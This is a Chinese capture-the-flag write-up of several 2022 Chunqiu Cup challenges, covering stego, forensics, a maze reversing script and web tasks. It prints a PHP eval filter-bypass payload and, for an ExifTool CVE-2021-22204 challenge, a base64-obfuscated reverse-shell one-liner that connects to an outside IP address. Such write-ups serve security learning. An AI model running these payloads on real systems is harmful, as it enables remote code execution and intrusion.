2022年春秋杯春季-勇者山峰-部分WriteUp

标签：0x0 ss WriteUp 0x1 cmd 勇者 2022 ip apache

关注公众号

看图弹钢琴得到flag

2、Mercy-code

<?php

highlight_file(__FILE__);

if ($_POST['cmd']) {

$cmd = $_POST['cmd'];

if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {

if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {

die('What are you thinking?');

} else {

eval($cmd);

}

} else {

die('Please calm down');

}

}

过滤了好多，查找php无参函数得到apache_request_headers()

apache_request_headers() // 获取请求头，但无法找到自定义头

end(apache_request_headers() // 输出80

ceil(sinh(cosh(tan(ceil(cosh(sin(tan(end(apache_request_headers()))))))))) // 通过运算得到 46

chr(46) // .

然后即可得到如下：

payload:

cmd=show_source(end(scandir(chr(ceil(sinh(cosh(tan(ceil(cosh(sin(tan(end(apache_request_headers())))))))))))));

3、tiger

png-key.txt里面的key先rot47解密一下，然后是lsb加密隐写，密码是

套了个明文攻击

得到一个二维码，微信扫码得到f‍‍‍‌‍‍‍‌‌‌‌‌‌‍‍‌‍‍‌‌‍‌‍‍‌‌‌‍‍‌‍‍‍‍‌‌‍‌‌‍‌‍‍‌‌‍‌‌‍‌‌‌‌‍‍‌‌‍‌‍‌‍‍‍‍‍‌‍‌‌‌‌‌‌‍‍‌‍‌‍‌‌‌‌‌‍‍‌‍‌‍‌‍‌‍‍‌‍‌‍‌‍‌‍‌‌‍‌‌‍‌‌‌‌‍‌‌‌‍‌‍‍‌‌‍‌‌‍‌‌‍‌‌‍‌‍‌‌‌‌‍‌‌‌‌‍‌‍‌‌‌‍‌‌‌‌‍‍‍lag is not here，零宽

这个不行

得到一串密文

维吉尼亚爆破得到：

5、被带走的机密文件

取证大师一把索，flag在打印记录里：

6、picture convert

https://github.com/trganda/CVE-2021-22204获得flag1

反弹shell：echo YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=|base64 -d|bash -i

再次访问/convert，获得flag2

7、ezam

控制流平坦化混淆，找个脚本去一下混淆

去完混淆后，可以分析出主要逻辑：先将输入的十进制数转换为四进制数，然后上下左右是0213，然后就是迷宫了

根据主要逻辑写脚本：

# -*- coding:utf-8 -*-

# 0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x1,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x1,0x0,0x1,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x1,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,

# 0x0,0x0,0x1,0x1,0x1,0x0,0x0,0x0,0x1,0x0,0x1,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x1,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x1,0x1,0x1,0x0,0x0,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x1,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

#

# 上0 下2 左1 右3

#

# sdssssdssddwwdwwwwdwddssssdddddddssssdddddddw

s="sdssssdssddwwdwwwwdwddssssdddddddssssdddddddd"

ss=""

for c in s:

if c=="w":

ss+="0"

elif c=="s":

ss+="2"

elif c=="a":

ss+="1"

else:

ss+="3"

print(ss)

#232222322330030000303322223333333222233333333

res="232222322330030000303322223333333222233333333"

sum=0

for i in range(len(res)):

sum+=int(res[i])*(4**(len(res)-1-i))

print(sum)

flag{902741462666576198076399615}

9、RecoverMe

先一个一个手撸字典（折磨）得到密钥应该是：aaaAAA111，挂载上去发现没什么有用的

假flag和提示

用passware恢复一下试试

因为之前已经手撸出秘钥了，所以我们自己导入的字典只需要放正确的那个就行了

得到一个未加密的磁盘文件

然后用FTK挂载，发现一个流量包：

流量包中发现传输的数据长度隐藏的有压缩包数据，tshark提出来：

tshark -r ./secret.pcapng -T fields -e data.len -Y "ip.src==192.168.43.186" > 1.txt

提示ip的变化

将所有ip也导出来：

tshark -r ./secret.pcapng -T fields -e ip.dst -Y "ip.src==192.168.43.186" > 2.txt

2个ip分别对应0和1，得到密码：

passwordh3r3

 

标签：0x0,ss,WriteUp,0x1,cmd,勇者,2022,ip,apache
From： https://www.cnblogs.com/rule-linux/p/16920433.html